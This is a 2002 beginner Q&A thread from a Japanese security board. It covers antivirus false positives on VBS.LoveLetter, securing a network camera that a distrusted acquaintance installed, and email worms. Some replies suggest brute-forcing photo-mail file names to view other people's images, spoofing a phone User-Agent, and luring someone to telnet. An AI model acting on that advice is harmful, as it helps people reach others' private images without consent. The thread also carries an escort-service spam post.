>>643 ウイルス名が分からないので何とも言えない。
が、2ちゃんを見ていて出たのならば、
>>430 を見ることを勧める。
教えてください。 今突然、初心者が感染しました。 というレスがされて、とりあえずF5でリロードしたんですけど ウィルス名も書いてませんでした。 あの、私は何を答えたらいいのでしょうか?
>644 ありがとうございます。 今見たのですが・・いまいち理解できません(汗) ただ2ちゃんに書き込んだだけで、誤操作があるということでしょうか? ウイルス名はラブレターと書いてありました。
>>646 答えるのに必要な情報を聞き出せるよう、それとなく振れば善し。
部屋に防犯用のネットワークカメラをつけたんですけど、 仕事関係の知り合いの人につけてもらったんですが、 その人はちょっと気持ち悪い&いやらしい人で。 IPアドとか全部知ってるので、部屋での生活を見られてそうで怖いです。 自分が部屋にいるときはレンズに紙を張って見えなくしてありますが。。。 侵入を防ぐのにいい方法を教えてください。
思いっきりスレ名にも誤反応って書いてあるじゃないか。 ・VBS.LoveLetter.A ↑ これだろ?問題ないよ。
今スキャンが終わって ウイルス名はVBS Loveletter A でした・・ どうでしょうか?。。
655 :
名無しさん@お腹いっぱい。 :02/07/05 23:05
>>647 ノートン先生が病原菌を見付けました。しかし、それはウイルスコード(ウイルスの仕組みなど)が書かれていたから反応しました。
一応ノートン先生は安全の為警告を出しました。
とりあえず、あなたのパソコンは感染していないので安心してください。
ノートン先生が過敏に反応してしまっただけです。
>651 ありがとうございました・・
>>657 ネットワークカメラの画像をどうやって外部から見るんだ?
カメラにIPアドが振ってあって、アクセスしたら見れちゃうんですよね。 よくわからないんですけど。
>>659 自分で見れないものを何故設置しとくんだ?
スイッチ付きのコンセントを間に挟んだら済むと思うけど。
webブラウザで
http://IP address/して見るんなら、
PCにNIC1枚足してプロキシ置いて
プロキシへのアクセスとプロキシのパスワードで制限するとか。
カメラにもパスワード認証が付いてそうな気もするけど。
>>659 さん
自分でもみれるんです。
外出先からも。
>>662 そのWebカメラには参照履歴の表示とか無い?
しかし、そういう不安感を持つ相手に良くPC設定させるよなぁ…
トロイの木馬とか仕掛けられてたらどうすんだ。
>>662 ネットワークカメラの製品名とネットワーク構成は?
>>662 いろいろ仕掛けられていてメールなんかも丸見えだろうな
取引先が、福祉関係の防犯カメラとかを扱っているとこで、 ストーカー被害にあって、旅行中に盗聴器を仕掛けられたことを話したら また部屋に入られると危ないから付けなさいって言われて。。。 付けなさいって、カメラを準備してくれた人にさっき話をして、 注意することになったんですが。 ADSLやプロバイダーもそちらの会社で手配してもらってるもので、 その怪しい人は私のPCのありとあらゆる設定を知ってるわけです。 どおしていいかわからないです。 PC買ったほうがいいのかな? でもそれもきついし。 機種はCANONです
661さん! 詳しく教えてください!
ネットワークカメラの(具体的な)製品仕様が
わかんないとどうしようもない。
で、後、ネットワーク構成(モデムかルーターか)と
手持ちのアイテム(自宅に電源付けっぱなしのPCが1台あるか、とか)。
>>667 スイッチの付いたタップをカメラのコンセントと壁のコンセントの間に挟む。
で、居るときはオフ、出かけるときにオンにする。
わざわざ目隠ししなくてもスイッチ一つ、指一本になって楽チンになる。
USBポートから電源取ってたりして。
670 :
名無しさん@お腹いっぱい。 :02/07/06 03:37
ノートンのアンチ・ビールスを入れています。 先ほど2ちゃんねるのあるスレッドを読みこんだところ、このようなメッセージが出ました。 「修復できません。 Norton Antivirusはウィルスまたはその他の悪質なコードをファイルから除去できませんでした。 ファイルはまだ感染しています。修復できない原因は損傷しすぎているか。または ウィルス定義が最新でないためこの問題に対応できていない可能性があります。 それで推奨どおりに「感染ファイルを検疫する」を選択しました。 こういう場合、このまま私は何もせず、放置しておいて良いのでしょうか? ウィルスチェックをしたところ、「VBS.Love Letter.A」という名称のウィルスのようです。
>>667 http://www.x-zone.canon.co.jp/WebView/product/vbc10/ これでええんだろうか?
661の後半の詳細
ネットワーク図
インターネット <-> ルーター <- ストレート -> NIC1-PC-NIC2 <- クロス -> カメラ
ルーターとカメラを繋いでるケーブルを抜く。
外出時用とは別に自宅にPCを1台置く。
PCに2つのNIC(LANカード)を挿して1つはルーターと
カテゴリー5「ストレート」ケーブルで繋ぐ。
もう1つはカメラとカテゴリー5「クロス」ケーブルで繋ぐ。
ルーターと繋がってるNIC(NIC1)のIPアドレスをルーターからDHCPで取得にする。
カメラと繋がってるNIC(NIC2)のIPアドレスを手動で設定する(i.e. 192.168.1.1)。
カメラ側のIPアドレスを手動で設定する(i.e. 192.168.1.2)。
カメラにアクセスできるアカウントを作りパスワードを設定する。
PCでHTTPプロキシサーバーを立てて利用者、アクセス先を制限し、
キャッシュはしない。
PCでパケットフィルターを動かせて、IPアドレス(出来ればポートも)を制限する。
出先 <-> NIC1 NIC2 <-> カメラ
プロキシサーバーで指定したポートをPCにそのまま流すようにルーターの設定をする。
(DMZとか何とかで設定する)
出先からカメラの画像を見るときはブラウザの設定でプロキシのアドレスに
自宅のグローバルIPアドレス(ルーターの外向きのIPアドレス)、
ポートにプロキシサーバーのポート番号を入れる。
後は、ブラウザから
http://カメラのIPアドレス/で出先からも見える 。
このままでは恐らく他のページが見えないので、
他のページを見るときはプロキシの設定を元に戻す。
但し、出先が会社内などでプライベートなプロキシサーバーを
介さなければいけない場合、この方法では見れない可能性大。
でも、やる事自体は割と楽なんじゃなかろうか。
後はお好みでNIDSを入れてルーター <-> PC、
PC <-> カメラのネットワークを監視するなり、なんなり。
>>668 さん
えと、ネットワークカメラは
「webブラウザで
http://IP address/ 」
ってやつです
VB-C10です
ネットワーク構成はADSLのMNってモデムに
カメラをブロードバンド・アクセス・ルーターを使って繋いでます。
使ってるとき(一日10時間程度)は接続しっぱなしで、電源はつけっぱのときと、切る時でまちまちです。
履歴表示ってほとんどのものについてるんでしょうか。
>>669 さん
USBポートから電源取ってたりして
ってどうゆうことなんでしょうか。。。?
最近変なメールと一緒に Content.scr とか width.scr, Src.bat,Valign.exe なるファイルが送られてくるんだけど これって何ですか?
さぁ。 見た事ないけど。
それが毎日いろんな人から送られてくるんだよね・・・ 気持ち悪いよ
>>673 あ、ルーターの管理パスワードも変更しないといけない。
後、プロバイダの認証パスワードと、POP3のパスワードも。
679 :
名無しさん@お腹いっぱい。 :02/07/06 04:13
ガイシュツかもしれませんが… あるCGIを実行せずにソースをいただく方法ってありますか??
>>672 読みに行ってきました。
まさにそれです。ありがとうございました。
添付ファイルだけをどうやってサーバーで削除するんですか?
676さん 本当にありがとうございました。 感謝感激。 やってみます 。。。むづかしそうですが。。。
685 :
名無しさん@お腹いっぱい。 :02/07/06 06:25
写メを自由に見たいのですが…ただの数字と記号の羅列に見えるし…なんかのソフト使えば簡単に見れそうです。よーするに暗唱番号分かればイーんですよね…?どなたか詳しい人教えてくださいお願いしますm(__)m
>>685 写メって何?素で分からない。
やべ・・・。俺もオジサンの仲間入り?
さっきニュー速でスレ観ようとしたら、ノートン先生が反応しました なんかVBS_love letterA とかでちゃってるんですけど…
691 :
名無しさん@お腹いっぱい。 :02/07/06 06:43
正解です!なんとか自由に見られないものでしょうか?
>>691 写メールだか何だかの画像が、
写メール掲示板だか何だかにバシバシ貼り付けてあった。
んで結論を言うと、普通に見れたよ?
もしかして、写メールだか何だかの文章の方ですか?
694 :
名無しさん@お腹いっぱい。 :02/07/06 06:57
http://www.docomo-caではなくて (;^_^A ソレ以外の画像です。写メールのURLを見るとパスワードみたいなのが書いてありますよね?それを見付けることが出来れば掲示板やアドレスを教えてもらうこと無く自由に見れるのではないかと…いうことです(;^_^A
695 :
名無しさん@お腹いっぱい。 :02/07/06 06:58
ではなくて(;^_^A ソレ以外の画像です。写メールのURLを見るとパスワードみたいなのが書いてありますよね?それを見付けることが出来れば掲示板やアドレスを教えてもらうこと無く自由に見れるのではないかと…いうことです(;^_^A
ランダムに割り振られるファイル名を探したいのか、 使用される文字列をリストアップして総当たりでやれば?
697 :
名無しさん@お腹いっぱい。 :02/07/06 07:10
やっぱり、それしかないですか…
何だ総当たりは嫌か。なら、 今の段階では真に無作為の乱数を生成することは出来ない。 だから乱数生成ルーチンと生成した乱数を文字に置き換えるルーチンを 突破すればわざわざ総当たりをしなくても良い。
699 :
名無しさん@お腹いっぱい。 :02/07/06 07:31
スイマセン。素人なんです(;_;)パソコンを不便無く使える程度で専門知識はまったくありませんm(__)m 素人に可能でしょうか?
>>684 そのカメラ設置者が実はストーカーってことはないのだろうか?
2時間ドラマの見すぎか…
>>552 まず、ルータでログ取れるようにするです。ルータじゃなければPFW入れるです。
telnet://自分のIPアドレス/に誘導するです。 終わり。
706 :
名無しさん@お腹いっぱい。 :02/07/06 13:07
すみません、質問です。 ルーターを導入することがセキュリティ対策になるってことをよく聞くんですが 何故対策になるんですか? 私はADSLを申し込んだ時にルータを選択したんですが、 このことは、少しはセキュリティに寄与しているのでしょうか?
707 :
名無しさん@お腹いっぱい。 :02/07/06 13:09
710 :
ひみつの検疫さん :2024/12/27(金) 06:08:33 ID:MarkedRes
汚染を除去しました。
>>710 てめえ二度と来るな。うちのノートンが騒いだじゃねーか。
714 :
名無しさん@お腹いっぱい。 :02/07/06 18:23
うちのノートンもせっせと無駄働きしたみたい〜。
715 :
名無しさん@お腹いっぱい。 :02/07/06 18:37
HDが「カンカンカンカン」と異音を発し再起動orフリーズ しちゃいます。これはなんというウイルスなのでしょうか?
>>717 了解しました。かちゅのログを消しました。そのあとお礼を書き込むためにまたこのスレを開きました。するとまたノートンが反応(以下略
わしがスパーリングパートナーやっちゃるけぇのぉ。 プログラム通り一人2Rだからね。
検索対象から外す方法とか書いてあんのに ろくすっぽ読まないで、 何でそんな糞レス付けるかな、このおたんこなす
ナイスパンチ ナイスパンチ すっげー藁える
あちこちの板で、アンチウイルスが反応するような 書き込みをする例が散見されるな。 つまらんことが流行っているもんだぜ。
セキュ板への嫌がらせだろう。
724 :
名無しさん@お腹いっぱい。 :02/07/06 20:53
「WIN.EXE.virusに感染したようです」というメッセージが 出たので、ウイルス除去ツールのサイトを調べたのですが、 このウイルス用のツールが見つかりません。こういうときは どうすればよいのでしょうか。
>>724 何がそういうメッセージを出したのか?アンチウィルスソフトが
出したのなら、検疫なり削除なりなんらかのアクションを起こしていると
思うのだが。
727 :
名無しさん@お腹いっぱい。 :02/07/06 21:34
ポートが開いている=そのポートには外部から自由にアクセスできる →80や8080等はproxyに使われるので、これらが開いていると端末に関係無く結果的に串とみなされる と言う認識であってますでしょうか?
>>727 少なくとも2chではね。
勿論、そのポートでサービスが動いてる必要があるよ。
>>725 レ
スありがとうございます。実は、REAL ONE PLAYERというのを
インストールした時についてきた、eAnthologyなるソフトが自動的に
ウイルスサーチした結果こういうメッセージが出たのです。
で、「このソフトを購入して、再度サーチをかければ自動的にウイルス
削除します」ということでしたので、今オンラインで支払いして
もう一度サーチしてるところです。これで無事削除されるといいのですが。
>>729 そんなのに金払わなくても無料のいいのがいっぱいあるのに・・・
先にそうした重要な情報を書くべきでしたね。
>>730 うーん、「ひょっとしたらこれってぼられてるのかな?」
とはちらっと思ったんですが、背に腹は替えられぬ、ってことで。
ありがとうございました。
732 :
名無しさん@お腹いっぱい。 :02/07/06 22:38
HDDのファイルがほとんど.zipになるウィルスって何ですか? 昨日感染してしまって、ノートンでも防げなかったんですが、 再起動したら、ブルー一色の壁紙でスタートメニューもファイルも ほとんど開けなかったんです。 それでスキャンかけたら.zipが、どば〜っと(泣
マーシの大冒険
734 :
732続き :02/07/06 22:41
ノートンではトロイとして検出したみたいですが、防げなかったとです。
(不謹慎)田代まさしゲーム 約1MB - ねずみ算的に分裂してゴミファイル作成、セーフモードで起動→分裂ファイル全消去で解決
(不謹慎)田代まさしゲーム 約1MB - ねずみ算的に分裂してゴミファイル作成、セーフモードで起動→分裂ファイル全消去で解決
738 :
◆2ZRk1cK. :02/07/06 22:57
今!うちの別のPCで、「知らない人から来たメールの添付ファイルを あけた」。 それは、空けた本人によると「PIF]という拡張子のついたもので、とにかく 強制終了した、とのこと。 再起動できず。 困ったなぁ・・・・。 これって、ウイルスですよね。PCの再セットアップをすれば直るのでしょうか? お教え願います。
>>736 すいません。もうだめだと思って、その場ですぐにフォーマットかけて
OS再インストールしたんです。でも防げなかったのがくやしいです。
教えていただいてありがとうございます。
だからさー・・・ MXで降ろしたexeなんか実行すんなと・・・
>>740 あぷろだにあったんですけど、間違ってクリックしたらしくて・・
これ新種のウィルスなんですか?
743 :
◆2ZRk1cK. :02/07/06 23:06
よろしくおねがいします
おめーさんよぉ アプロダもMXも、相手が特定できないんだぜ?出元が特定できない exeを何故踏めるの。ウィルス入ってなくても、そもそもそいつが 悪意があって、HDあぼーんさせよーってプログラムを作って 名前変えてあぷするなんてこといくらでも考えられるだろ。 とにかくなんでもかんでもexeは踏むな。
746 :
◆2ZRk1cK. :02/07/06 23:11
もしかして、スレ違いでしたか?
>>744 思わず踏んじゃったのでかんべんしてください・・
>>746 とりあえず、OS入れなおしで問題無いだろう。
とにかく添付は開くなと、きつく調教しておけ。
exe,com,pif,reg,bat
ここらへん絶対さわっちゃだめ。
はあ、、ノートンに情報送っとけばよかった・・(鬱
>>748 はいわかりました。今後気をつけます。というか拡張子もっとよく見る
ように注意しますです。。
オッオッ! 毎日新聞が夜中にオープンしたぞ(w
毎日新聞、また落ちた…
754 :
◆2ZRk1cK. :02/07/06 23:20
>>748 ありがとうございます。
exe以外にもcom,pif,reg,bat らも、危険なんですね。
レスありがとう。
あ〜あ、せっかくの日曜が再セットアップかよぉ・・。
皆さんもお気をつけください。
755 :
名無しさん@お腹いっぱい。 :02/07/06 23:55
ルータとXPのFWを入れてるのですが、これはセキュリティ対策として どれくらいのレベルなのですか? たとえば、お家の防犯対策にたとえると、セコムしたくらいの威力は ありますかね? それとも、戸に鍵をかけたくらいの効果かな? 教えてくださいおねがいします。
>>755 ルータを使ってるなら、それだけである程度は。
ルーターに穴があることもあるので、過信は禁物です。
PCニュース板クリックすると、ノートン先生がウイルス見つけるんだけど どうなってるの?
>>758 即レスサンキョ、
誤反応ですか、別に問題ないですよね?
無い。そこの2みれば大体内容がわかる
また即レスでサンキョ。 ありがとうございます。 ホントにくだらない質問でごめんね。
この板の人はみんながみんなXPのFW機能のことを糞っていうんですよね? でも、ほんとに糞なんですか?その根拠をすこし教えてくださいますか。 天下のマイクロソフトが作ったものですぞ?? 信用に値しないのですかね?? 初心者にも分るレベルでおながおします。
「天下のマイクロソフトが作ったものですぞ」warata
天下のM$様が作ったOEはデフォでhtml読み、プレビュオンという 素晴らしい機能のおかげでウィルスの幅を広げなさった信用に値するメーラです。 さすがM$。 て裕香、XPのFWは普通に低機能で、無いよりマシ程度。 雨が降ってきたとき傘持ってないからとりあえずシャンプーハットかぶろって程度。
>天下のマイクロソフトが作ったものですぞ?? ( ´,_ゝ`)プッ
お前らよくそこまでマイクロソフトをコケに出来るもんだ。 お前らが快適なPCライフを送れるのはウィンドウズのおかげですよ? で、XPのFWが糞な理由を教えて下さいよ。 頼みますよ? 糞糞言うんだったらその理由もいってくれないと、XPに対して アンフェアですよ?
ネタだろな。 ポート毎しか設定できない、アウトバウンドの監視もできない これで十分だと思ますが
快適なPCライフってジャパネットタカタが言いそう
>>767 しっかりとOSの運用・管理ができてれば、その程度でも十分なんだけど、
ユーザーの大半が ―
>>769 そんな事言ったら、適切なポートの管理してあるプロバで
共有とか全部きってまともな管理してればFWなんかいらない。
しかし
>>766 みたいな ―
>>770 んぁ、ごめん。同意レスのつもりが、オブラートに包もうとした結果、
あらぬ誤解を ─
いや分かって ─
755黙っちゃったね。さっきの勢いはどこへやら。
お前よくそこまでマイクロソフトをマンセー出来るもんだ。
お前が快適なウィルスライフを送れるのはウィンドウズのおかげですよ?
で、
>>767 のレスに返答を書いて下さいよ。
頼みますよ?
マンセー言うんだったらその機能も把握してくれないと、セキュリティに対して
小学生並みですよ?
(´-`).。oO(755逃げたな)
そうか、お前ら、いろいろ答えてくれてありがとう。 でもさ、そうやってすぐネタって決めてかかるのはお前らのよくない所だと思うよ。 そりゃぁさ、2ちゃんにいれば疑い深くなるのはわかるよ。 ブラクラもあればウイルスもある。 心ないことを書き込む輩もいる。 でもさ、だからといって人を信用しないのはよくないことだと思うんだ。 いったん心の窓を開けて、澄み切った心持ちでないと見えて来ない真実だってあるわけさ。 ましてや、このスレは右も左も分らないような私みたいな初心者が 藁をもすがる思いで質問するわけさ。 だからさ、その子たちに「氏ね」とか「逝ってよし」とか「( ´,_ゝ`)プッ」 とか言うのはさ、いけないことだと思うんだ。さみしいことだと思うんだ。 でもさ、やっぱりちゃんと返事を返してくれる、名無しさん@お腹いっぱい。 は、根はいい子だと思うんだ。ほんとはやさしいさ。 だから、最後にこう言うな。ありがとうな。
とりあえず、775を755に直せと指摘してみるテスト
>>778 ここはすばらしいインターネットですよ。
私なんか、毎日リンクしてます。
ここは酷いインターナットですね。
>>778 どう言い訳しようか考えるのに時間掛かってたのね(w
>>755 みたいな愚か者が「インターネットする」
などと、自信ありげにほざくんだろうな。
どうか、755を、俺のケツの穴に免じて許してやってくれ。
んでも、与えられた情報を鵜呑みにせずに、 懐疑的な目で見てるから、素質はあるなと。 自分で検証しちゃったりしたら、尚良かったけど。
ROMってたヤシにも勉強になったろうから755も役に立ったんじゃないか。
790 :
名無しさん@お腹いっぱい。 :02/07/07 02:51
ファイヤーウォール及びウイルスソフトを今日買いに行きます 関連スレは見ましたがどのソフトも良し悪しの様で マカだけは買わないことに決めたのですが 今の段階で買うとしたら何がお勧めでしょうか? ノートPC OSはMe 回線はADSL ルーターはNEC WARPSTARΔWBR75H 無線接続です
まかふぃーでいいんじゃないの? 月刊アスキーのレビューでは評価高いよ。軽そうだし。 漏れはNIS使ってるけど、別に良くも悪くもない。 フリーのやつも一長一短だしね。
つーかこれだけフリーで良いものが転がってるのに 何で金を出す必要があるの
サポートが付くからじゃないの
皆さん有難う御座います ZoneAlarmはフリーで落としてきました これで充分なのでしょうか? もし充分なようでしたらウイルスソフトだけ買おうかと思っています
>>792 これは私もみました
実際買おうかなと思ってたら評判の良くないスレを見つけて
躊躇しておりました
>>796 >これで充分なのでしょうか?
どのセキュリティーソフトにも当てはまるけど、
くれぐれも過信しないようにね。
>>798 承知しました
そのあたりはこれから関連スレで勉強していきます
ご忠告感謝いたします
すいません。。FWのIGMPルールで「TCPIP kernel driver」ってのを やたらとブロックするんですけど、これはなんなんでしょうか。 カーネルプロセッサの使用率というのが常に 100パーセントなんですけど、何か関係あるんでしょうか?
ついさっきまで、CGIエラーとかいう画面が表示されて書き込めなかったんですが。 漏れだけっすか?
>>801 すいません下げ癖がついていて(鬱)
上げます
>>800 インかアウトで違うよ。ウイルスチェックはした?
805 :
名無しさん@お腹いっぱい。 :02/07/08 21:26
PCを禁止しているiモードのサイトにPCから行くことは不可能ですか?
>>805 ヘッダのUSER-AGENTを変更?
DoCoMo/1.0/N504i/c10/TB
とか
>>806 ちょっとそれだけだと良く分かりません・・あほでごめん。
このスレ行け!でもいいんでも少し教えて下さい。
808 :
名無しさん@お腹いっぱい。 :02/07/08 21:42
最近たまにパソコンから「ガガッ、ガガッ」 って音がしてフリーズして、そのしばらくあとに「Cディスクに書き込めません。 (Dのときもある)ファイルが見当たりません」みたいなエラーメッセージが でるのですけど、この症状はなんなのでしょうか? そのあとすぐに起動しようとすると「insert disk ,push enter key」なるメッセージが 出て起動することもできません。 しばらく時間を置いて起動すると普通に起動するのですが・・・ ウイルスチェックはしましたがなにも検出されませんでした。 窓98を使っています。
おしえてください。 Qttaskってなんですか?
-------風俗の総合商社・MTTどこでも-------
〇デリバリーヘルス〇デートクラブ〇女性専用ホストクラブ〇
〇ハードSM奴隷クラブ〇レズビアン倶楽部〇ホモ・オカマ倶楽部
〇変態痴女と遊ぶ会〇痴漢・覗き趣味の会〇変態同好会・各種!
●楽しく遊べます! 090-8002-8356番
-----------美男・美女会員など多数在籍中-----------
http://www.mttdocomo.jp/ -----女性アルバイト随時募集・高収入(日払い)月100万円可能-----
-----レズビアン・スタッフ●ホモスタッフ●女性専用ホストスタッフ同募-----
http://www.mttdocomo.jp/ ------------------------------------------------
812 :
名無しさん@お腹いっぱい。 :02/07/08 22:04
>>806 いまどきUSERエージェントで、
弾いてるところなんて、希少だと思われるが、、、
813 :
助けて〜! :02/07/08 22:21
放置プレイ中 餌を与えないで下さい。 −園長−
>>808 それ、HDDいかれかけてんじゃないのか?
無事なうちにデータなどを救出しておいてから
スキャンディスクとかやってみるべきじゃないかな。
>808 >816さんも言ってるけどスキャンディスクをするべき。 標準チェックじゃなくて完全チェックの方にしないと駄目だぞ。
>>815 様
うわ〜、ご親切にありがとうございます。
お陰さまで眠れます。
本当に感謝してます。
>>804 レスありがとうございます!
遅レスすみません。今見たら全部アウトでした。
ウィルスチェックはしてるんですが、ちょっと古いソフトなので
本当にチェックできているかどうか不安ではあります。
ウィルス反応はなかったです。
820 :
名無しさん@お腹いっぱい。 :02/07/08 23:00
ウィルスチェックソフトは最新でなくては意味が無い。
822 :
名無しさん@お腹いっぱい。 :02/07/08 23:19
本当に下らない質問で申し訳ないんですが ルータにDHCPサーバでプライベートIPの児童割り振りしてると 息継ぎ現象があると聞きまして、思い当たる父子があるので 手動で固定にしたいのですが、上手くいきません。 コントロールパネル→ネットワークのTCP/IP -> (LANカードのドライバ) のプロパティで、IPアドレスのところを192.168.1.2、 ゲートウェイに192.168.1.1を追加したんですが、再起動後 インターネットに接続できていません。ルータの方でDHCPサーバをオフ にしても同じです。どこがおかしいのか分かる方、もしくは、サイトなどでも いいので教えて頂けないでしょうか。
↑ 書き忘れました、OSはwin95OSR2、 ルータはPLANEXのBRL-04Fです。
>>822 板違いだけど、ルータのアドレスは192.168.1.1で正しいのでしょうか?
あと、サブネットマスクも設定しましたか?
macafee ファイアーウォールでさっきから30回くらい俺のPCに 接続しようとしてるのがいるんだけど、何なんですか???? 昨日はじめてファイアーウォール買ってきたんだけど、昨日も 30件以上接続しようとするのがあった。
>>822 ルーターのLAN側のIPアドレスは192.168.1.1?
Win95のDNS設定は、DNSサーバーをルーターにしてる?
>>824 すんません、もうしわけないです。
ルー他のアドレスは間違ってないです。
>>826 はい、DNSサーバの設定弄ってませんでした・・・
ここはプロバから通知されてるDNSサーバのアドレスを指定するのですか?
ルータのアドレスにすればいいのでしょうか?
ちょっとためしてみます
板違いほんとすみません。
>>829 わかりました〜、そちらで聞いてみます、レスありがとうございます
板違い質問すみませんでした。
>>825 大体はワームに感染したサーバが送ってくるゴミなので
サーバを稼動させていたりファイアーウォールソフトでの設定がずさんなものでない限り大丈夫な筈です。
832 :
名無しさん@お腹いっぱい。 :02/07/08 23:55
jdbgmgr.exe(テディベアのicon) て、ウイルスなんですか???
>>831 ありがとうございます。アメリカのシアトルやニューヨークとか
イタリアのミラノとかいろいろな場所からだったので、余計にびびり
ました。
>>835 そのファイルに悪意のあるプログラムを仕込むウィルスもあるから、
気をつけなよ。
837 :
名無しさん@お腹いっぱい。 :02/07/09 00:35
友達から「あなたからワーム32のウイルスメールが最近良く来る」 と指摘されて、ウイルスチェックしたんですが見つかりません このような場合相手に原因があるんですか? こちらはウイルスバスター2002で探しました
838 :
名無しさん@お腹いっぱい。 :02/07/09 00:38
CELLPADDINGっていう、件名のメールがきたんだけど これってウィルスですか??
840 :
名無しさん@お腹いっぱい。 :02/07/09 00:44
>839さん 見てないんです
841 :
名無しさん@お腹いっぱい。 :02/07/09 00:48
837の追加ですが、アドレスに登録してある 他の人にはそんなメールは届いていません。 その子一人だけなんです
クレズ(WORM_KLEZ) このようなタイプのワームでは、「差出人」を感染コンピュータ内で取得した任意のメールアドレスとして設定する場合があります。 そのため「差出人」として設定されているメールアドレス使用者のコンピュータが感染しているとは限りません。
843 :
名無しさん@お腹いっぱい。 :02/07/09 00:56
近頃ネット接続がすこぶる良好なんですが何ででしょうか? いつもルーターのコンセント抜いたりしたら中々繋がらない のに今日はなんとパソコンの電源を入れてからコンセントを 入れても二回目で繋がりました。いつもは抜いたらパソコン の電源を入れたらすぐにコンセントを挿さないと駄目だった のに。 皆さんはなんでだと思いますか?自分は多分ハッキングか何か されてるんじゃないか不安なんです。どっかのポートが勝手に 開けられたりしてるんじゃないのかとか、速度も異常にはやい んです。
845 :
名無しさん@お腹いっぱい。 :02/07/09 01:00
>842さん という事は私が原因じゃないんですね その子は他からも毎日のようにウイルスメールが来ると言ってました 最近感染して大変だったとか
>>845 ウイルス対策ソフトがきちんと更新されており
それでウイルス検索をされて何も発見されなければ心配ないはずです。
847 :
名無しさん@お腹いっぱい。 :02/07/09 01:10
>846さん 最新版に更新してからチェックしました
848 :
名無しさん@お腹いっぱい。 :02/07/09 01:12
>>844 即レスありがとうございます、本領発揮しているならそれはそれで
喜ばしい事なんですが(w)大丈夫ですよね?
849 :
名無しさん@お腹いっぱい。 :02/07/09 01:27
毎回、ネットに接続したとたんに、 SYSTEMという名前(拡張子不明)のプログラム?が udpとtcpでローカルポート137から139に対して何かをしようと 待機中(listening)になるんですが、これは何をするつもりなのでしょうか。。 検索してもどのSYSTEMだかわからないんです。
NetBIOS over TCP/IP
ntoskernel.exeかな
852 :
名無しさん@お腹いっぱい。 :02/07/09 02:35
eroeroserverというサーバにアクセスしようとしたんだけど、なんか全然 つながりません、どうやったらつなぐことができるんですか、誰でもいいから おしえてください。
>>852 セキュリティとどう関係あるのかと(以下略
eroeroserverのあるところまで行ったら、 服のほつれを引っ張ってごらん、多分、繋がると思うよ。 混んでるんだろ。今日はオナニーするなってことだ。神の思し召し。
しかもマルチだし
856 :
名無しさん@お腹いっぱい。 :02/07/09 02:57
厨な質問で申し訳ありません。 J-COMですが公開プロキシ規制で書き込めないので、2ちゃんねるだけ プロキシを使用しないようにしたいのですが「LANの設定」→「プロキシサーバー」 →「詳細設定」にある「例外」欄には何と入れたらいいのでしょうか? 「;2ch net」と入れてみましたが、はじかれてしまいました・・・ セミコロンをとってもダメでした。 よろしくお願いします。
857 :
名無しさん@お腹いっぱい。 :02/07/09 02:57
>>853 だってくだらない質問はここに書けといっているもんだから・・・
>>854 教えてくれ有難う、今日はオナニーしないでもう寝るよ、でもしたかったよー
>>858 *.2ch.netをコピペで貼ったらうまくいきました。
有難うございました。
いえいえ。
861 :
名無しさん@お腹いっぱい。 :02/07/09 05:42
VB2002で、ユーザー期限が過ぎたのですが、 なぜか今までどおりアップデートできます。 ・・・仕様なのでしょうか?
MP3からウィルス感染することがあると聞いたんですが、 どういう原理で感染してるんですか? ウィルス付きEXEであってもバイナリエディタで開けば無害なのに、 MP3をただのMP3プレーヤーで起動だけで感染し得るんでしょうか? それとも、Windowsメディアプレーヤーの脆弱性を利用するとかですか? (その場合、他のプレーヤーでも問題は起こり得るでしょうか?)
拡張子がmp3だからといって本当にMP3とは限らないしね。
ていうか聞いたことねーぞ それと本当にmp3じゃなかったらプレーヤーで開けなくて終わりだろが
>>816 >>817 レスありがとうございます!昨夜もフリーズしました・・・・(汗
とりあえずデータのバックアップ取ってスキャンディスク
やってみます。
半年ぐらい前にMP3で感染させる方法が見つかったとか ZDNetあたりのニュースサイトで見たな。 まあなぷすた系共有ソフトの全盛期だったから、 それを抑止するために流されたデマだったかも知れんね。
868 :
名無しさん@お腹いっぱい。 :02/07/09 13:21
YAHOO、逝ってます?
逝ってます。
逝ってるね、確かに>ahoo
>>850-851 レスありがとうございます。。。
>ntoskernel.exe
これ、検索したらuser.datというファイルの中で
書き込まれてるのは見たんですけど、本体がどこにあるのか
わかりません。。。何か良くないファイルなんですか?
875 :
名無しさん@お腹いっぱい。 :02/07/09 16:28
ノートンってクラック防げんの??
ノートンって単一の製品名ではないよ。
877 :
名無しさん@お腹いっぱい。 :02/07/09 16:38
VBS.LoveLetterなるウイルスが検出されました。 これはやばいウイルスでしょうか? あとノートンアンチウイルスを使っているのですが 修復できないらしいです。感染はまぬがれたみたいですが・・・ まだPC内にウイルスを持っている状態です。 どうすればいいの?
879 :
名無しさん@お腹いっぱい。 :02/07/09 16:45
>>878 ありがとう。ノートン導入して2年目にして初のウイルス
検出だったんで、かなり動揺しました。
880 :
名無しさん@お腹いっぱい。 :02/07/09 19:10
厨房の寝言くらい脳内でフィルタリングできんのか・・・
882 :
名無しさん@お腹いっぱい。 :02/07/09 19:23
ウイルス対策にAVGを使っているのですが、アップデートしようとすると ノートンファイヤーウォールがじゃまをするようです。 拡張オプションをさわってみたりしましたが、どうにも、上手くいきません。 どなたか、解決方法をご存知の方、お教え願えませんでしょうか。
883 :
名無しさん@お腹いっぱい。 :02/07/09 19:26
ファイヤーウォール
>>882 アップデートのときだけファイヤーウオール切れば
ちょっと前、ニュー速+のデータが消えたけど あれはなんだったんですか?
>>885 アパッチの穴をまともに付かれたらしいっす。
あの・・・ntoskernel.exeって何なんでしょうか。 重ね重ねすみません。 関係ないですけど今、この板来たとたんin_addr.btopenworldcomって やつ3回連続でブロックしました。。
ツールでクッキーの中の暗号化されたパスを複合するモノがあると聞いたんですが、 詳しいこと知ってるからいらっしゃいます??
891 :
cheshire-cat :02/07/09 23:07
すんません、これまた馬鹿な質問っす。 「アリ!」「ナシ!」で、アンケートじゃないけど大勢の人から即レスほしいんですけど。 日本国内で利用されていて、企業とかじゃなくて個人で、プリインストール版で、日本語版じゃない他言語版パソを見たことある人って、何人いますか? 漏れは3回程度しかないんですけど。
892 :
cheshire-cat :02/07/09 23:08
ちなみにWindowsの話っす。
893 :
名無しさん@お腹いっぱい。 :02/07/09 23:20
自分が年を取ったって実感中。 どうも煽りスキル低下中っす。 漏れの質問、無視して下さい。 アイディアが浮かばん。。。。
>>891 -
>>894 こっちは、見ようと思えば各国語 win が見えるが、何か?
ちなみに自分は一部に日本語版 win に英語版 anti-virus
入れてるが。
